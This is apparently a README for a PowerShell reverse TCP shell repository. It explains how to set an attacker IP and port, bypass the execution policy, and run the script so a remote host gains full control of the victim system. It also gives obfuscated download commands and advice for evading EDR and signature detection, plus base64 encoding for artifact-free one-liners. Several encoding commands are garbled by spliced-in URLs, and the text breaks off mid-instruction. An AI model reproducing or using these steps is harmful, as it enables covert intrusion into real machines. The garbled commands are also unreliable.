
PowerShell scripts for communicating with a remote host.
PowerShell scripts for communicating with a remote host.
Remote host will have a full control over the client and all the underlying system commands.
Check shells based on:
Tested with PowerShell v5.1.19041.2673 on Windows 10 Enterprise OS (64-bit).
Made for educational purposes. I hope it will help!
This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.
Future plans:
Change the IP address and port number inside the scripts as necessary.
Open the PowerShell from \src\invoke_expression\original\ or \src\process_pipes\original\ and run the commands shown below.
Set the execution policy:
Set-ExecutionPolicy Unrestricted
Run the script:
.\powershell_reverse_tcp.ps1
Or, run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1
Try to bypass EDR and other security mechanisms by obfuscating your scripts. You can see such obfuscations in the examples below.
Original PowerShell command:
(New-Object Net.WebClient).DownloadFile($url, $out)
Obfuscated PowerShell command:
& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'
Check the original PowerShell script here and the fully obfuscated one here.
After manual obfuscation, the original PowerShell script was obfuscated with Invoke-Obfuscation. Credits to the author!
Search the Internet for additional obfuscation techniques and methods.
P.S. Because PowerShell is constantly being updated, some regular expressions (e.g. *ke-E*) may start to throw exceptions due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.
To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:
[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
To decode a PowerShell encoded command, run the following PowerShell command:
[Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
Use the one-liners below if you don't want to leave any artifacts behind.
[Reverse TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt: